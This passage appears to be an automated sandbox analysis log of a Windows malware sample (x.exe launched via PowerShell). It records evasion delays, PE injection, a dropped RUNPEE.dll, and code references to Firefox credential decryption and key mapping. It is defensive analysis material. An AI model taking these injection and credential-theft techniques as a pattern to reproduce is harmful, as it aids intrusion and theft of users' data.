                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: D50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2B00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2810000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 5080000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 6080000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 61B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 71B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2AA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2CE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2B00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2913Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeWindow / User API: threadDelayed 2643Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeWindow / User API: threadDelayed 7171Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeWindow / User API: foregroundWindowGot 1768Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RUNPEE.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 800Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3596Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6060Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 5216Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -99891s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -99782s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -99657s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -99532s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -99422s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -99313s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -99188s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -99063s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -98938s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -98813s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -98703s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -98594s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -98469s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -98360s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -98235s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -98110s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -97985s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -97860s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -97735s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -97610s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -97485s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -97360s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -97235s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -97110s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -96985s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -96860s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -96645s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -96485s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -96323s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -96219s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -96016s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -95891s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -95782s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -95657s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -95532s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -95407s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -95297s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -95188s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -95063s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -94938s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -94813s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -94688s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -94578s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -94469s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -94344s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -94235s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -94110s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -93985s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -93718s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -93563s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -93375s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016Thread sleep time: -93250s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6252Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6252Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 99891Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 99782Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 99657Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 99532Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 99422Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 99313Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 99188Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 99063Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 98938Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 98813Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 98703Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 98594Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 98469Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 98360Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 98235Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 98110Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 97985Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 97860Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 97735Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 97610Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 97485Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 97360Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 97235Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 97110Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 96985Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 96860Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 96645Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 96485Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 96323Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 96219Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 96016Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 95891Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 95782Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 95657Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 95532Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 95407Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 95297Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 95188Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 95063Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 94938Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 94813Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 94688Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 94578Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 94469Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 94344Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 94235Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 94110Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 93985Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 93718Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 93563Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 93375Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 93250Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: x.exe, 00000004.00000002.1131825044.0000000000DCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
                      Source: svchost.exe, 00000006.00000002.2827493932.0000021EB5E53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2825804218.0000021EB082B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: x.exe, 00000005.00000002.3552935335.0000000000E78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: svchost.exe, 00000006.00000002.2825843302.0000021EB0840000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWD
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      .NET source code references suspicious native API functions
                      Source: 4.2.x.exe.4329590.3.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                      Source: 4.2.x.exe.4329590.3.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                      Source: 4.2.x.exe.4329590.3.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Users\user\AppData\Local\Temp\x.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
                      Source: x.exe, 00000005.00000002.3555469132.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3555469132.0000000002D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR
                      Source: x.exe, 00000005.00000002.3555469132.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3555469132.0000000002D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: x.exe, 00000005.00000002.3555469132.0000000002EE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerXg*
                      Source: x.exe, 00000005.00000002.3555469132.0000000002D50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerlB
                      Source: x.exe, 00000005.00000002.3555469132.0000000002D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\Desktop\DON.ps1 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RUNPEE.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
